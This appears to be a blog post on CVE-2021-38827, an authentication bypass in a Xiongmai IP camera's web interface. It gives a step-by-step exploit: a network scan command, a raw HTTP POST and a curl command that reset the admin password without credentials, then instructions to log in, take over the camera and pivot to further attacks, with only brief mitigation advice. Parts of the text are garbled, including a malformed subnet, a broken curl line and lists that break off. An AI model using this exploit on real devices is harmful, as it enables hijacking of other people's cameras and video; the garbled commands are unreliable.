CVE-2021-38827 - Complete Account Takeover in Xiongmai Camera XM-JPR2-LX V4.02.R12.A6420987.10002.147502.00000

If you’re using Xiongmai cameras, particularly the model XM-JPR2-LX running firmware version V4.02.R12.A6420987.10002.147502.00000, your security could be at risk. In this post, we deep-dive into CVE-2021-38827 – a critical vulnerability that can let an attacker take over any account on your camera, giving them full control over video streams, device config, and more.

What’s CVE-2021-38827?

Discovered by security researcher mehdy, CVE-2021-38827 affects a range of Xiongmai IoT devices, including several popular camera models. On affected versions, improper authentication inside the web interface allows attackers to bypass login and change passwords without proper checks. This leads to a classic account takeover scenario.

How Does the Vulnerability Work?

On vulnerable firmware, the web management interface fails to properly verify a user's identity before allowing password changes or sensitive operations. Attackers can send a specially-crafted HTTP POST request to the management portal and reset any user’s password. Once changed, they can then log in as the admin or any other user.

The vulnerable endpoint typically looks like this

POST http://<camera_ip>/cgi-bin/gw.cgi?Cmd=SET_USERINFO

The system does not actually check for a valid session or password. That means anyone who can talk to the camera can send this request and successfully change passwords.

1. Discover Camera IP

This camera usually listens on port 80 (HTTP) on your local network. Nmap or similar tools can find it.

nmap -p 80 192.168.1./24

You don't need to authenticate; you just POST this payload to the device

POST /cgi-bin/gw.cgi?Cmd=SET_USERINFO HTTP/1.1
Host: <camera_ip>
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>

UserName=admin&Password=new_secure_password&UserLevel=&ENUserName=admin

The payload above just updates the admin password to new_secure_password. No existing password required!

Example with curl

curl -X POST \
  "http://192.168.1.200/cgi-bin/gw.cgi?Cmd=SET_USERINFO"; \
  -d "UserName=admin&Password=newsecurepassword&UserLevel=&ENUserName=admin"

After running this, you can log in using the new password.

After resetting the password, just access the management page

http://192.168.1.200/

Log in with admin:newsecurepassword and take over the camera.

Disable the device or reconfigure for malicious purposes (e.g., pivot for further attacks)

- Add/remove accounts

Update Firmware: If newer, secure firmware is available from Xiongmai, update immediately.

- Network Segmentation: Make sure your cameras are on isolated networks, inaccessible from the internet.

References

- CVE-2021-38827 - NVD
- Original Exploit Details /advisory
- Vendor Website (Xiongmai)

Conclusion

CVE-2021-38827 is a glaring example of how poor authentication design can lead to a full account takeover. If you use the Xiongmai XM-JPR2-LX (or any similar Xiongmai-powered camera), your device may be wide open until patched or isolated.

Stay secure: patch quickly, use strong and unique passwords, and never expose IoT devices directly to the internet.

If you found this guide useful, share it with anyone you know running Xiongmai cameras!

Timeline

Published on: 11/14/2022 02:15:00 UTC
Last modified on: 11/16/2022 18:29:00 UTC